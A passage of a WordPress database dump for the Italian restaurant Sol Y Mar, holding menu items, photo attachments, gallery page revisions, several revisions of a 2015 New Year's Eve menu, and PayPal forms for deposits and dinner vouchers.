','','','publish','open','closed','','124','','','2020-12-19 08:52:05','2020-12-19 07:52:05','',10,'http://www.ristorantesolymar.it/?p=124',10,'nav_menu_item','',0),(126,1,'2015-08-03 16:34:15','2015-08-03 14:34:15',' ','','','publish','open','closed','','126','','','2020-12-19 08:52:05','2020-12-19 07:52:05','',22,'http://www.ristorantesolymar.it/?p=126',23,'nav_menu_item','',0),(127,1,'2015-08-03 16:34:16','2015-08-03 14:34:16',' ','','','publish','open','closed','','127','','','2020-12-19 08:52:05','2020-12-19 07:52:05','',22,'http://www.ristorantesolymar.it/?p=127',30,'nav_menu_item','',0),(128,1,'2015-08-03 16:34:16','2015-08-03 14:34:16',' ','','','publish','open','closed','','128','','','2020-12-19 08:52:05','2020-12-19 07:52:05','',22,'http://www.ristorantesolymar.it/?p=128',27,'nav_menu_item','',0),(129,1,'2015-08-03 16:34:15','2015-08-03 14:34:15',' ','','','publish','open','closed','','129','','','2020-12-19 08:52:05','2020-12-19 07:52:05','',22,'http://www.ristorantesolymar.it/?p=129',24,'nav_menu_item','',0),(130,1,'2015-08-03 16:34:16','2015-08-03 14:34:16',' ','','','publish','open','closed','','130','','','2020-12-19 08:52:05','2020-12-19 07:52:05','',22,'http://www.ristorantesolymar.it/?p=130',28,'nav_menu_item','',0),(131,1,'2017-07-16 09:03:17','2017-07-16 07:03:17','Acquista il tuo pranzo o la tua cena online: il Sol Y Mar ti propone questi menù per 2 persone. Scegli il tuo menù, compila i campi e concludi l\'acquisto del buono. Se invece vuoi regalare un buono\n[product_category category=\"acquista-cena\"]','Acquista Cena','','inherit','open','open','','36-autosave-v1','','','2017-07-16 09:03:17','2017-07-16 07:03:17','',36,'http://www.ristorantesolymar.it/2015/08/03/36-autosave-v1/',0,'revision','',0),(132,1,'2015-08-03 17:12:32','2015-08-03 15:12:32','[one_fourth]<h2>Menu\' Creativo per 2 persone</h2>\r\nBenvenuto della cucina\r\nDegustazione di antipasti\r\nUn crudo e due cotti\r\nLa pasta\r\nIl pesce\r\nDessert\r\nEuro 98,00 (Escluso Bavande)[/one_fourth][one_fourth]<h2>Menu\' creativo per 2 persone + bere</h2>\r\nMenu\' creativo + 1 bottiglia di vino + 2 caffe\' + 1 bottiglia d\'acqua\r\nEuro 120[/one_fourth][one_fourth]<h2>Menu\' Storico per 2 persone</h2>\r\nCalamari saltati con patate e bacon\r\nGamberi alla greca\r\nSpaghetto alle vongole\r\nFrittura mista e lo spiedone grigliato\r\nSorbetto\r\nEuro 90,00 (Escluso Bavande)[/one_fourth][one_fourth]<h2>Menu\' storico per 2 persone + bere</h2>\r\nMenu\' storico per due persone con 1 bottiglia di vino 2 caffè e una bottiglia d\'acqua\r\nEuro 115[/one_fourth]\r\n\r\n<form action=\"https://www.paypal.com/cgi-bin/webscr\" method=\"post\" target=\"paypal\"><input name=\"cmd\" type=\"hidden\" value=\"_s-xclick\" />\r\n<input name=\"hosted_button_id\" type=\"hidden\" value=\"YDDAGXBWAKA8U\" />\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><input name=\"on0\" type=\"hidden\" value=\"Scegli Menù\" />Scegli Menù</td>\r\n</tr>\r\n<tr>\r\n<td><select name=\"os0\">\r\n<option value=\"Creativo x 2 persone\">Creativo x 2 persone €98,00 EUR</option>\r\n<option value=\"Creativo x 2 persone + bere\">Creativo x 2 persone + bere €120,00 EUR</option>\r\n<option value=\"Storico x 2 persone\">Storico x 2 persone €90,00 EUR</option>\r\n<option value=\"Storico x 2 persone + bere\">Storico x 2 persone + bere €115,00 EUR</option>\r\n</select></td>\r\n</tr>\r\n<tr>\r\n<td><input name=\"on1\" type=\"hidden\" value=\"Nominativi\" />Nominativi</td>\r\n</tr>\r\n<tr>\r\n<td><input maxlength=\"200\" name=\"os1\" type=\"text\" /></td>\r\n</tr>\r\n<tr>\r\n<td><input name=\"on2\" type=\"hidden\" value=\"Telefono\" />Telefono</td>\r\n</tr>\r\n<tr>\r\n<td><input maxlength=\"200\" name=\"os2\" type=\"text\" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<input name=\"currency_code\" type=\"hidden\" value=\"EUR\" />\r\n<input alt=\"PayPal è il metodo rapido e sicuro per pagare e farsi pagare online.\" name=\"submit\" src=\"https://www.paypalobjects.com/it_IT/IT/i/btn/btn_cart_LG.gif\" type=\"image\" />\r\n<img src=\"https://www.paypalobjects.com/it_IT/i/scr/pixel.gif\" alt=\"\" width=\"1\" height=\"1\" border=\"0\" />\r\n\r\n</form>','Acquista Cena','','inherit','open','open','','36-revision-v1','','','2015-08-03 17:12:32','2015-08-03 15:12:32','',36,'http://www.ristorantesolymar.it/2015/08/03/36-revision-v1/',0,'revision','',0),(134,1,'2015-08-16 20:40:28','2015-08-16 18:40:28','','IMG_1409','','inherit','open','open','','img_1409','','','2015-08-16 20:40:28','2015-08-16 18:40:28','',0,'http://www.ristorantesolymar.it/wp-content/uploads/2015/08/IMG_1409.jpg',0,'attachment','image/jpeg',0),(135,1,'2015-08-16 20:40:33','2015-08-16 18:40:33','','IMG_1441','','inherit','open','open','','img_1441','','','2015-08-16 20:40:33','2015-08-16 18:40:33','',0,'http://www.ristorantesolymar.it/wp-content/uploads/2015/08/IMG_1441.jpg',0,'attachment','image/jpeg',0),(136,1,'2015-08-16 20:40:39','2015-08-16 18:40:39','','IMG_1444','','inherit','open','open','','img_1444','','','2015-08-16 20:40:39','2015-08-16 18:40:39','',0,'http://www.ristorantesolymar.it/wp-content/uploads/2015/08/IMG_1444.jpg',0,'attachment','image/jpeg',0),(137,1,'2015-08-16 20:40:46','2015-08-16 18:40:46','','IMG_1608','','inherit','open','open','','img_1608','','','2015-08-16 20:40:46','2015-08-16 18:40:46','',0,'http://www.ristorantesolymar.it/wp-content/uploads/2015/08/IMG_1608.jpg',0,'attachment','image/jpeg',0),(138,1,'2015-08-16 20:40:52','2015-08-16 18:40:52','','IMG_1922','','inherit','open','open','','img_1922','','','2015-08-16 20:40:52','2015-08-16 18:40:52','',0,'http://www.ristorantesolymar.it/wp-content/uploads/2015/08/IMG_1922.jpg',0,'attachment','image/jpeg',0),(3711,0,'2021-01-14 13:22:34','2021-01-14 12:22:34','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Newsletter, SMTP, Email marketing and Subscribe forms by Sendinblue (from version 3.1.1 to 3.1.2)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar] Some plugins were automatically updated','Incorrect authentication data\r\n','private','closed','closed','','sol-y-mar-some-plugins-were-automatically-updated-28','','','2021-01-14 13:22:34','2021-01-14 12:22:34','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-some-plugins-were-automatically-updated-28/',0,'postman_sent_mail','',0),(141,1,'2015-08-16 22:03:37','2015-08-16 20:03:37','<h2>La location</h2>\r\n[gallery size=\"medium\" link=\"file\" columns=\"2\" ids=\"67,135,137,138,1183,1184,1185,1186,1187,1188,1189,1190,1191,1192,1193,1194,1195,1196,1197,1198,1199,1200,1201,1202\"]\r\n<h2>I piatti</h2>\r\n[gallery link=\"file\" ids=\"146,143,145,144,142,136,147,134,1181,1180,1179,1178,1177,1174,1176,1182\"]','Gallery','','publish','closed','open','','gallery','','','2020-10-29 13:41:11','2020-10-29 12:41:11','',0,'http://www.ristorantesolymar.it/?page_id=141',0,'page','',0),(142,1,'2015-08-16 22:01:57','2015-08-16 20:01:57','','IMG_1044','','inherit','open','open','','img_1044','','','2015-08-16 22:01:57','2015-08-16 20:01:57','',141,'http://www.ristorantesolymar.it/wp-content/uploads/2015/08/IMG_1044.jpg',0,'attachment','image/jpeg',0),(143,1,'2015-08-16 22:02:05','2015-08-16 20:02:05','','IMG_1045','','inherit','open','open','','img_1045','','','2015-08-16 22:02:05','2015-08-16 20:02:05','',141,'http://www.ristorantesolymar.it/wp-content/uploads/2015/08/IMG_1045.jpg',0,'attachment','image/jpeg',0),(144,1,'2015-08-16 22:02:12','2015-08-16 20:02:12','','IMG_1120','','inherit','open','open','','img_1120','','','2015-08-16 22:02:12','2015-08-16 20:02:12','',141,'http://www.ristorantesolymar.it/wp-content/uploads/2015/08/IMG_1120.jpg',0,'attachment','image/jpeg',0),(145,1,'2015-08-16 22:02:18','2015-08-16 20:02:18','','IMG_1146','','inherit','open','open','','img_1146','','','2015-08-16 22:02:18','2015-08-16 20:02:18','',141,'http://www.ristorantesolymar.it/wp-content/uploads/2015/08/IMG_1146.jpg',0,'attachment','image/jpeg',0),(146,1,'2015-08-16 22:02:25','2015-08-16 20:02:25','','IMG_1643','','inherit','open','open','','img_1643','','','2015-08-16 22:02:25','2015-08-16 20:02:25','',141,'http://www.ristorantesolymar.it/wp-content/uploads/2015/08/IMG_1643.jpg',0,'attachment','image/jpeg',0),(147,1,'2015-08-16 22:02:35','2015-08-16 20:02:35','','IMG_1830','','inherit','open','open','','img_1830','','','2015-08-16 22:02:35','2015-08-16 20:02:35','',141,'http://www.ristorantesolymar.it/wp-content/uploads/2015/08/IMG_1830.jpg',0,'attachment','image/jpeg',0),(148,1,'2015-08-16 22:03:37','2015-08-16 20:03:37','[gallery link=\"file\" ids=\"142,143,144,145,146,147,138,137,136,135,134,67,40\" orderby=\"rand\"]','Gallery','','inherit','open','open','','141-revision-v1','','','2015-08-16 22:03:37','2015-08-16 20:03:37','',141,'http://www.ristorantesolymar.it/2015/08/16/141-revision-v1/',0,'revision','',0),(149,1,'2015-08-16 22:05:57','2015-08-16 20:05:57',' ','','','publish','open','closed','','149','','','2020-12-19 08:52:05','2020-12-19 07:52:05','',0,'http://www.ristorantesolymar.it/?p=149',2,'nav_menu_item','',0),(150,1,'2016-04-20 19:36:16','2016-04-20 17:36:16','[gallery size=\"medium\" link=\"file\" columns=\"2\" ids=\"67,135,137,138\"]','Gallery','','inherit','open','open','','141-autosave-v1','','','2016-04-20 19:36:16','2016-04-20 17:36:16','',141,'http://www.ristorantesolymar.it/2015/08/16/141-autosave-v1/',0,'revision','',0),(151,1,'2015-08-16 22:07:27','2015-08-16 20:07:27','[gallery columns=\"5\" ids=\"147,146,145,144,143,135,136,137,138,142,134,67,40\"]','Gallery','','inherit','open','open','','141-revision-v1','','','2015-08-16 22:07:27','2015-08-16 20:07:27','',141,'http://www.ristorantesolymar.it/2015/08/16/141-revision-v1/',0,'revision','',0),(152,1,'2015-08-16 22:15:10','2015-08-16 20:15:10','[gallery size=\"large\" columns=\"5\" ids=\"143,147,146,145,144,135,136,137,138,142,134,67,40\"]','Gallery','','inherit','open','open','','141-revision-v1','','','2015-08-16 22:15:10','2015-08-16 20:15:10','',141,'http://www.ristorantesolymar.it/2015/08/16/141-revision-v1/',0,'revision','',0),(153,1,'2015-08-16 22:17:08','2015-08-16 20:17:08','[gallery size=\"large\" columns=\"4\" ids=\"143,147,146,145,144,135,136,137,138,142,134,67,40\"]','Gallery','','inherit','open','open','','141-revision-v1','','','2015-08-16 22:17:08','2015-08-16 20:17:08','',141,'http://www.ristorantesolymar.it/2015/08/16/141-revision-v1/',0,'revision','',0),(154,1,'2015-08-16 22:21:59','2015-08-16 20:21:59','[gallery size=\"large\" columns=\"3\" ids=\"143,147,146,145,144,135,136,137,138,142,134,67,40\"]','Gallery','','inherit','open','open','','141-revision-v1','','','2015-08-16 22:21:59','2015-08-16 20:21:59','',141,'http://www.ristorantesolymar.it/2015/08/16/141-revision-v1/',0,'revision','',0),(206,1,'2018-07-31 09:52:28','2018-07-31 09:52:28','','h1-img-9a','','inherit','open','closed','','h1-img-9a','','','2018-07-31 09:52:28','2018-07-31 09:52:28','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/h1-img-9a.jpg',0,'attachment','image/jpeg',0),(158,2,'2015-11-29 09:26:56','2015-11-29 08:26:56','<em>Dobbiamo diventare il cambiamento che vogliamo vedere.</em>\r\n<em> (Mahatma Gandhi)</em>\r\n<h1>San Silvestro 2015</h1>\r\n<em>Entrée di Benvenuto</em>\r\n<em> .Crudo di scampo alla pizzaiola e burrata</em>\r\n<em> .Rollé di Gallinella al sesamo su crema di porri e lemongrass</em>\r\n<em> .Alici dorate su insalatina di indivia ,arancio e avocado</em>\r\n<em> -Gnocchetti di patate alla carbonara di Triglie affumicate e tartufo</em>\r\n<em> .Tataki di Ricciola ,burro e salvia con scalogno al vino rosso</em>\r\n<em> .Granita allo Spumante (pre dessert)</em>\r\n<em> .I Tre Cioccolati</em>\r\n<em> .Caffè e piccola mousse al panettone</em>\r\n\r\n60 € escluso bevande\r\nBambini 7/13 anni menù 30 €\r\n1 /6 Coperto San Silvestro 10 € ordinazione libera\r\n\r\nPer prenotazioni telefonare allo 0541 648528 è richiesta la caparra pari alla metà dell\'importo. La prenotazione si ritiene confermata solo dopo il pagamento della caparra, vista la complessità di alcuni piatti, eventuali allergie e intolleranze andranno segnalate preventivamente\r\n\r\n<strong>Invia Caparra</strong>\r\n<em>NOTA IMPORTANTE: prima informarsi della disponibilità!!</em>\r\n<form action=\"https://www.paypal.com/cgi-bin/webscr\" method=\"post\" target=\"_top\">\r\n<input type=\"hidden\" name=\"cmd\" value=\"_s-xclick\">\r\n<input type=\"hidden\" name=\"hosted_button_id\" value=\"6ZSKW4YEVLBPQ\">\r\n<table>\r\n<tr><td><input type=\"hidden\" name=\"on0\" value=\"Adulti\">Adulti</td></tr><tr><td><select name=\"os0\">\r\n	<option value=\"1 adulto\">1 adulto €30,00 EUR</option>\r\n	<option value=\"2 adulti\">2 adulti €60,00 EUR</option>\r\n	<option value=\"3 adulti\">3 adulti €90,00 EUR</option>\r\n	<option value=\"4 adulti\">4 adulti €120,00 EUR</option>\r\n	<option value=\"5 adulti\">5 adulti €150,00 EUR</option>\r\n	<option value=\"6 adulti\">6 adulti €180,00 EUR</option>\r\n</select> </td></tr>\r\n<tr><td><input type=\"hidden\" name=\"on1\" value=\"Bambini\">Bambini</td></tr><tr><td><select name=\"os1\">\r\n	<option value=\"0\">0 </option>\r\n	<option value=\"1\">1 </option>\r\n	<option value=\"2\">2 </option>\r\n	<option value=\"3\">3 </option>\r\n	<option value=\"4\">4 </option>\r\n</select> </td></tr>\r\n<tr><td><input type=\"hidden\" name=\"on2\" value=\"Nome e telefono di chi prenota\">Nome e telefono di chi prenota</td></tr><tr><td><input type=\"text\" name=\"os2\" maxlength=\"200\"></td></tr>\r\n</table>\r\n<input type=\"hidden\" name=\"currency_code\" value=\"EUR\">\r\n<input type=\"image\" src=\"https://www.paypalobjects.com/it_IT/IT/i/btn/btn_buynowCC_LG.gif\" border=\"0\" name=\"submit\" alt=\"PayPal è il metodo rapido e sicuro per pagare e farsi pagare online.\">\r\n<img alt=\"\" border=\"0\" src=\"https://www.paypalobjects.com/it_IT/i/scr/pixel.gif\" width=\"1\" height=\"1\">\r\n</form>\r\n','Menù di Capodanno 2016','','publish','open','open','','menu-di-capodanno-2016','','','2015-12-30 13:13:08','2015-12-30 12:13:08','',0,'http://www.ristorantesolymar.it/?p=158',0,'post','',0),(159,1,'2015-11-29 09:26:30','2015-11-29 08:26:30','','','','inherit','open','closed','','solymar-capodanno','','','2015-11-29 09:26:45','2015-11-29 08:26:45','',158,'http://www.ristorantesolymar.it/wp-content/uploads/2015/11/solymar-capodanno.jpg',0,'attachment','image/jpeg',0),(160,1,'2015-11-29 09:26:56','2015-11-29 08:26:56','<img class=\"alignnone size-full wp-image-159\" src=\"http://www.ristorantesolymar.it/wp-content/uploads/2015/11/solymar-capodanno.jpg\" alt=\"sol y mare feste natale\" width=\"800\" height=\"441\" />\r\n\r\n<em>Dobbiamo diventare il cambiamento che vogliamo vedere.</em>\r\n<em> (Mahatma Gandhi)</em>\r\n<h1>San Silvestro 2015</h1>\r\n<em>Entrée di Benvenuto</em>\r\n<em> .Crudo di scampo alla pizzaiola e burrata</em>\r\n<em> .Rollé di Gallinella al sesamo su crema di porri e lemongrass</em>\r\n<em> .Alici dorate su insalatina di indivia ,arancio e avocado</em>\r\n<em> -Gnocchetti di patate alla carbonara di Triglie affumicate e tartufo</em>\r\n<em> .Tataki di Ricciola ,burro e salvia con scalogno al vino rosso</em>\r\n<em> .Granita allo Spumante (pre dessert)</em>\r\n<em> .I Tre Cioccolati</em>\r\n<em> .Caffè e piccola mousse al panettone</em>\r\n\r\n60 € escluso bevande\r\nBambini 7/13 anni menù 30 €\r\n1 /6 Coperto San Silvestro 10 € ordinazione libera\r\n\r\nPer prenotazioni telefonare allo 0541 648528 è richiesta la caparra pari alla metà dell\'importo. La prenotazione si ritiene confermata solo dopo il pagamento della caparra, vista la complessità di alcuni piatti, eventuali allergie e intolleranze andranno segnalate preventivamente','Menù di Capodanno 2016','','inherit','closed','closed','','158-revision-v1','','','2015-11-29 09:26:56','2015-11-29 08:26:56','',158,'http://www.ristorantesolymar.it/2015/11/29/158-revision-v1/',0,'revision','',0),(161,1,'2015-11-29 09:28:03','2015-11-29 08:28:03','<em>Dobbiamo diventare il cambiamento che vogliamo vedere.</em>\r\n<em> (Mahatma Gandhi)</em>\r\n<h1>San Silvestro 2015</h1>\r\n<em>Entrée di Benvenuto</em>\r\n<em> .Crudo di scampo alla pizzaiola e burrata</em>\r\n<em> .Rollé di Gallinella al sesamo su crema di porri e lemongrass</em>\r\n<em> .Alici dorate su insalatina di indivia ,arancio e avocado</em>\r\n<em> -Gnocchetti di patate alla carbonara di Triglie affumicate e tartufo</em>\r\n<em> .Tataki di Ricciola ,burro e salvia con scalogno al vino rosso</em>\r\n<em> .Granita allo Spumante (pre dessert)</em>\r\n<em> .I Tre Cioccolati</em>\r\n<em> .Caffè e piccola mousse al panettone</em>\r\n\r\n60 € escluso bevande\r\nBambini 7/13 anni menù 30 €\r\n1 /6 Coperto San Silvestro 10 € ordinazione libera\r\n\r\nPer prenotazioni telefonare allo 0541 648528 è richiesta la caparra pari alla metà dell\'importo. La prenotazione si ritiene confermata solo dopo il pagamento della caparra, vista la complessità di alcuni piatti, eventuali allergie e intolleranze andranno segnalate preventivamente','Menù di Capodanno 2016','','inherit','closed','closed','','158-revision-v1','','','2015-11-29 09:28:03','2015-11-29 08:28:03','',158,'http://www.ristorantesolymar.it/2015/11/29/158-revision-v1/',0,'revision','',0),(162,1,'2015-11-29 09:28:47','2015-11-29 08:28:47','<em>Dobbiamo diventare il cambiamento che vogliamo vedere.</em>\r\n<em> (Mahatma Gandhi)</em>\r\n<h1>San Silvestro 2015</h1>\r\n<em>Entrée di Benvenuto</em>\r\n<em> .Crudo di scampo alla pizzaiola e burrata</em>\r\n<em> .Rollé di Gallinella al sesamo su crema di porri e lemongrass</em>\r\n<em> .Alici dorate su insalatina di indivia ,arancio e avocado</em>\r\n<em> -Gnocchetti di patate alla carbonara di Triglie affumicate e tartufo</em>\r\n<em> .Tataki di Ricciola ,burro e salvia con scalogno al vino rosso</em>\r\n<em> .Granita allo Spumante (pre dessert)</em>\r\n<em> .I Tre Cioccolati</em>\r\n<em> .Caffè e piccola mousse al panettone</em>\r\n\r\n60 € escluso bevande\r\nBambini 7/13 anni menù 30 €\r\n1 /6 Coperto San Silvestro 10 € ordinazione libera\r\n\r\nPer prenotazioni telefonare allo 0541 648528 è richiesta la caparra pari alla metà dell\'importo. La prenotazione si ritiene confermata solo dopo il pagamento della caparra, vista la complessità di alcuni piatti, eventuali allergie e intolleranze andranno segnalate preventivamente','Menù di Capodanno 2016','Dobbiamo diventare il cambiamento che vogliamo vedere.\r\n(Mahatma Gandhi)\r\n\r\nSan Silvestro 2015\r\n\r\nEntrée di Benvenuto\r\n.Crudo di scampo alla pizzaiola e burrata\r\n......','inherit','closed','closed','','158-revision-v1','','','2015-11-29 09:28:47','2015-11-29 08:28:47','',158,'http://www.ristorantesolymar.it/2015/11/29/158-revision-v1/',0,'revision','',0),(163,1,'2015-11-29 09:29:25','2015-11-29 08:29:25','<em>Dobbiamo diventare il cambiamento che vogliamo vedere.</em>\r\n<em> (Mahatma Gandhi)</em>\r\n<h1>San Silvestro 2015</h1>\r\n<em>Entrée di Benvenuto</em>\r\n<em> .Crudo di scampo alla pizzaiola e burrata</em>\r\n<em> .Rollé di Gallinella al sesamo su crema di porri e lemongrass</em>\r\n<em> .Alici dorate su insalatina di indivia ,arancio e avocado</em>\r\n<em> -Gnocchetti di patate alla carbonara di Triglie affumicate e tartufo</em>\r\n<em> .Tataki di Ricciola ,burro e salvia con scalogno al vino rosso</em>\r\n<em> .Granita allo Spumante (pre dessert)</em>\r\n<em> .I Tre Cioccolati</em>\r\n<em> .Caffè e piccola mousse al panettone</em>\r\n\r\n60 € escluso bevande\r\nBambini 7/13 anni menù 30 €\r\n1 /6 Coperto San Silvestro 10 € ordinazione libera\r\n\r\nPer prenotazioni telefonare allo 0541 648528 è richiesta la caparra pari alla metà dell\'importo. La prenotazione si ritiene confermata solo dopo il pagamento della caparra, vista la complessità di alcuni piatti, eventuali allergie e intolleranze andranno segnalate preventivamente','Menù di Capodanno 2016','Dobbiamo diventare il cambiamento che vogliamo vedere.\r\n(Mahatma Gandhi)\r\n\r\nSan Silvestro 2015\r\n\r\nEntrée di Benvenuto\r\n.Crudo di scampo alla pizzaiola e burrata\r\n.Rollé di Gallinella al sesamo su crema di porri e lemongrass\r\n.Alici dorate su insalatina di indivia ,arancio e avocado\r\n-Gnocchetti di patate alla carbonara di Triglie affumicate e tartufo\r\n.Tataki di Ricciola ,burro e salvia con scalogno al vino rosso\r\n.Granita allo Spumante (pre dessert)\r\n.I Tre Cioccolati\r\n.Caffè e piccola mousse al panettone\r\n\r\n60 € escluso bevande\r\nBambini 7/13 anni menù 30 €\r\n1 /6 Coperto San Silvestro 10 € ordinazione libera\r\n\r\nPer prenotazioni telefonare allo 0541 648528 è richiesta la caparra pari alla metà dell\'importo. La prenotazione si ritiene confermata solo dopo il pagamento della caparra, vista la complessità di alcuni piatti, eventuali allergie e intolleranze andranno segnalate preventivamente','inherit','closed','closed','','158-revision-v1','','','2015-11-29 09:29:25','2015-11-29 08:29:25','',158,'http://www.ristorantesolymar.it/2015/11/29/158-revision-v1/',0,'revision','',0),(164,1,'2015-11-29 09:31:59','2015-11-29 08:31:59','<em>Dobbiamo diventare il cambiamento che vogliamo vedere.</em>\r\n<em> (Mahatma Gandhi)</em>\r\n<h1>San Silvestro 2015</h1>\r\n<em>Entrée di Benvenuto</em>\r\n<em> .Crudo di scampo alla pizzaiola e burrata</em>\r\n<em> .Rollé di Gallinella al sesamo su crema di porri e lemongrass</em>\r\n<em> .Alici dorate su insalatina di indivia ,arancio e avocado</em>\r\n<em> -Gnocchetti di patate alla carbonara di Triglie affumicate e tartufo</em>\r\n<em> .Tataki di Ricciola ,burro e salvia con scalogno al vino rosso</em>\r\n<em> .Granita allo Spumante (pre dessert)</em>\r\n<em> .I Tre Cioccolati</em>\r\n<em> .Caffè e piccola mousse al panettone</em>\r\n\r\n60 € escluso bevande\r\nBambini 7/13 anni menù 30 €\r\n1 /6 Coperto San Silvestro 10 € ordinazione libera\r\n\r\nPer prenotazioni telefonare allo 0541 648528 è richiesta la caparra pari alla metà dell\'importo. La prenotazione si ritiene confermata solo dopo il pagamento della caparra, vista la complessità di alcuni piatti, eventuali allergie e intolleranze andranno segnalate preventivamente','Menù di Capodanno 2016','','inherit','closed','closed','','158-revision-v1','','','2015-11-29 09:31:59','2015-11-29 08:31:59','',158,'http://www.ristorantesolymar.it/2015/11/29/158-revision-v1/',0,'revision','',0),(165,1,'2015-11-29 09:42:15','2015-11-29 08:42:15','<em>Dobbiamo diventare il cambiamento che vogliamo vedere.</em>\r\n<em> (Mahatma Gandhi)</em>\r\n<h1>San Silvestro 2015</h1>\r\n<em>Entrée di Benvenuto</em>\r\n<em> .Crudo di scampo alla pizzaiola e burrata</em>\r\n<em> .Rollé di Gallinella al sesamo su crema di porri e lemongrass</em>\r\n<em> .Alici dorate su insalatina di indivia ,arancio e avocado</em>\r\n<em> -Gnocchetti di patate alla carbonara di Triglie affumicate e tartufo</em>\r\n<em> .Tataki di Ricciola ,burro e salvia con scalogno al vino rosso</em>\r\n<em> .Granita allo Spumante (pre dessert)</em>\r\n<em> .I Tre Cioccolati</em>\r\n<em> .Caffè e piccola mousse al panettone</em>\r\n\r\n60 € escluso bevande\r\nBambini 7/13 anni menù 30 €\r\n1 /6 Coperto San Silvestro 10 € ordinazione libera\r\n\r\nPer prenotazioni telefonare allo 0541 648528 è richiesta la caparra pari alla metà dell\'importo. La prenotazione si ritiene confermata solo dopo il pagamento della caparra, vista la complessità di alcuni piatti, eventuali allergie e intolleranze andranno segnalate preventivamente\r\n\r\n<form action=\"https://www.paypal.com/cgi-bin/webscr\" method=\"post\" target=\"_top\">\r\n<input type=\"hidden\" name=\"cmd\" value=\"_s-xclick\">\r\n<input type=\"hidden\" name=\"hosted_button_id\" value=\"6ZSKW4YEVLBPQ\">\r\n<table>\r\n<tr><td><input type=\"hidden\" name=\"on0\" value=\"Adulti\">Adulti</td></tr><tr><td><select name=\"os0\">\r\n	<option value=\"1 adulto\">1 adulto €30,00 EUR</option>\r\n	<option value=\"2 adulti\">2 adulti €60,00 EUR</option>\r\n	<option value=\"3 adulti\">3 adulti €90,00 EUR</option>\r\n	<option value=\"4 adulti\">4 adulti €120,00 EUR</option>\r\n	<option value=\"5 adulti\">5 adulti €150,00 EUR</option>\r\n	<option value=\"6 adulti\">6 adulti €180,00 EUR</option>\r\n</select> </td></tr>\r\n<tr><td><input type=\"hidden\" name=\"on1\" value=\"Bambini\">Bambini</td></tr><tr><td><select name=\"os1\">\r\n	<option value=\"0\">0 </option>\r\n	<option value=\"1\">1 </option>\r\n	<option value=\"2\">2 </option>\r\n	<option value=\"3\">3 </option>\r\n	<option value=\"4\">4 </option>\r\n</select> </td></tr>\r\n<tr><td><input type=\"hidden\" name=\"on2\" value=\"Nome e telefono di chi prenota\">Nome e telefono di chi prenota</td></tr><tr><td><input type=\"text\" name=\"os2\" maxlength=\"200\"></td></tr>\r\n</table>\r\n<input type=\"hidden\" name=\"currency_code\" value=\"EUR\">\r\n<input type=\"image\" src=\"https://www.paypalobjects.com/it_IT/IT/i/btn/btn_buynowCC_LG.gif\" border=\"0\" name=\"submit\" alt=\"PayPal è il metodo rapido e sicuro per pagare e farsi pagare online.\">\r\n<img alt=\"\" border=\"0\" src=\"https://www.paypalobjects.com/it_IT/i/scr/pixel.gif\" width=\"1\" height=\"1\">\r\n</form>\r\n','Menù di Capodanno 2016','','inherit','closed','closed','','158-revision-v1','','','2015-11-29 09:42:15','2015-11-29 08:42:15','',158,'http://www.ristorantesolymar.it/2015/11/29/158-revision-v1/',0,'revision','',0),(166,1,'2015-11-29 09:42:52','2015-11-29 08:42:52','<em>Dobbiamo diventare il cambiamento che vogliamo vedere.</em>\r\n<em> (Mahatma Gandhi)</em>\r\n<h1>San Silvestro 2015</h1>\r\n<em>Entrée di Benvenuto</em>\r\n<em> .Crudo di scampo alla pizzaiola e burrata</em>\r\n<em> .Rollé di Gallinella al sesamo su crema di porri e lemongrass</em>\r\n<em> .Alici dorate su insalatina di indivia ,arancio e avocado</em>\r\n<em> -Gnocchetti di patate alla carbonara di Triglie affumicate e tartufo</em>\r\n<em> .Tataki di Ricciola ,burro e salvia con scalogno al vino rosso</em>\r\n<em> .Granita allo Spumante (pre dessert)</em>\r\n<em> .I Tre Cioccolati</em>\r\n<em> .Caffè e piccola mousse al panettone</em>\r\n\r\n60 € escluso bevande\r\nBambini 7/13 anni menù 30 €\r\n1 /6 Coperto San Silvestro 10 € ordinazione libera\r\n\r\nPer prenotazioni telefonare allo 0541 648528 è richiesta la caparra pari alla metà dell\'importo. La prenotazione si ritiene confermata solo dopo il pagamento della caparra, vista la complessità di alcuni piatti, eventuali allergie e intolleranze andranno segnalate preventivamente\r\n\r\n<strong>Invia Caparra</strong>\r\n<form action=\"https://www.paypal.com/cgi-bin/webscr\" method=\"post\" target=\"_top\">\r\n<input type=\"hidden\" name=\"cmd\" value=\"_s-xclick\">\r\n<input type=\"hidden\" name=\"hosted_button_id\" value=\"6ZSKW4YEVLBPQ\">\r\n<table>\r\n<tr><td><input type=\"hidden\" name=\"on0\" value=\"Adulti\">Adulti</td></tr><tr><td><select name=\"os0\">\r\n	<option value=\"1 adulto\">1 adulto €30,00 EUR</option>\r\n	<option value=\"2 adulti\">2 adulti €60,00 EUR</option>\r\n	<option value=\"3 adulti\">3 adulti €90,00 EUR</option>\r\n	<option value=\"4 adulti\">4 adulti €120,00 EUR</option>\r\n	<option value=\"5 adulti\">5 adulti €150,00 EUR</option>\r\n	<option value=\"6 adulti\">6 adulti €180,00 EUR</option>\r\n</select> </td></tr>\r\n<tr><td><input type=\"hidden\" name=\"on1\" value=\"Bambini\">Bambini</td></tr><tr><td><select name=\"os1\">\r\n	<option value=\"0\">0 </option>\r\n	<option value=\"1\">1 </option>\r\n	<option value=\"2\">2 </option>\r\n	<option value=\"3\">3 </option>\r\n	<option value=\"4\">4 </option>\r\n</select> </td></tr>\r\n<tr><td><input type=\"hidden\" name=\"on2\" value=\"Nome e telefono di chi prenota\">Nome e telefono di chi prenota</td></tr><tr><td><input type=\"text\" name=\"os2\" maxlength=\"200\"></td></tr>\r\n</table>\r\n<input type=\"hidden\" name=\"currency_code\" value=\"EUR\">\r\n<input type=\"image\" src=\"https://www.paypalobjects.com/it_IT/IT/i/btn/btn_buynowCC_LG.gif\" border=\"0\" name=\"submit\" alt=\"PayPal è il metodo rapido e sicuro per pagare e farsi pagare online.\">\r\n<img alt=\"\" border=\"0\" src=\"https://www.paypalobjects.com/it_IT/i/scr/pixel.gif\" width=\"1\" height=\"1\">\r\n</form>\r\n','Menù di Capodanno 